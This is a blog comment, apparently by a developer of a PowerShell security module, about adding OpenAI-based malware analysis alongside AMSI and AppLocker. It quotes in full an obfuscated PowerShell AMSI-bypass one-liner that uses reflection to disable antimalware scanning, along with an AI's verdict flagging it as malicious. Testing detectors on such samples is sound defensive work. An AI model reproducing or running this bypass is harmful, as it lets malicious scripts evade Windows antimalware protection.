Hey mate. I don’t know if you will see this comment. I hope so. I’m adding AI functionality into PowerShell Protect to perform malware analysis based on reputation. I’m in the process of testing atm, however I’m getting issues with loading the configuration when running Test-PNPConfiguration. Did you have a tool/process that you used to hook a debugger into the AMSI?
Cool beans… AMSI question for you. Did you manage to extract the user identity or the process id of the executing code? It seems that it’s possible based on this, but I wanted to get your thoughts on this.
My idea is to integrate PSP with AppLocker/WDAC, where scripts that meet the Applocker ruleset are skipped and rules that don’t meet that criteria then are handled by the AMSI. Coupled with OpenAI, this will make for a formidable module.
FYI: OpenAI Handling Amsi.fail obfuscated code:
You
Just the json, no explanation or usage. Analyze the following PowerShell Script for security risks. Simplify your response as a Boolean called 'result' and include a rating (scoring from bad to good) between 0 and 1. Just the json, no explanation or usage.
#Unknown - Force error
$Ag=$null;$meph=[$(('Sys'+'tem').NOrmalizE(ChAr+ChAR+ChaR+CHAR+CHAR) -replace Char+cHaR+CHAR+ChAr+cHAr+char).Runtime.InteropServices.Marshal]::AllocHGlobal((9076*8451/8451));$ikglrjc="+('pôãpcmmn'+'xzcõ').NormALiZe(ChaR+ChAr+CHaR+cHar+CHaR) -replace char+ChaR+CHar+ChaR+chaR+CHaR";[Threading.Thread]::Sleep(851);[Ref].Assembly.GetType("$(('Sys'+'tem').NOrmalizE(ChAr+ChAR+ChaR+CHAR+CHAR) -replace Char+cHaR+CHAR+ChAr+cHAr+char).$(cHAR+cHar+ChaR+cHAR+CHAr+cHAR+cHaR+Char+cHar+cHaR).$(('Àutõmát'+'îõn').NormalizE(CHaR+chAR+chaR+CHar+chAr) -replace Char+cHar+cHAr+ChAR+ChAR+char).$(cHAr+cHaR+cHAR+ChAr+cHAR+cHAr+chaR+chaR+CHAr)").GetField("$(char+ChAR+cHAr+CHAr+CHAR+CHAR+chaR+CHAr+CHAr+ChAr+chAR)", "NonPublic,Static").SetValue($Ag, $null);[Ref].Assembly.GetType("$(('Sys'+'tem').NOrmalizE(ChAr+ChAR+ChaR+CHAR+CHAR) -replace Char+cHaR+CHAR+ChAr+cHAr+char).$(cHAR+cHar+ChaR+cHAR+CHAr+cHAR+cHaR+Char+cHar+cHaR).$(('Àutõmát'+'îõn').NormalizE(CHaR+chAR+chaR+CHar+chAr) -replace Char+cHar+cHAr+ChAR+ChAR+char).$(cHAr+cHaR+cHAR+ChAr+cHAR+cHAr+chaR+chaR+CHAr)").GetField("$(cHar+CHAR+cHar+ChAR+cHaR+cHaR+chAr+CHAR+CHAR+cHAR+ChaR)", "NonPublic,Static").SetValue($null, [IntPtr]$meph);
Response:
result: True
rating: 1 (bad)
The PowerShell script appears to be obfuscated and contains multiple suspicious commands that could potentially be used for malicious purposes. The use of the AllocHGlobal method and the SetValue method with non-public, static fields are particularly concerning. Additionally, the script forces an error which could be used to hide its true purpose. Overall, this script should be treated as highly suspicious and potentially dangerous.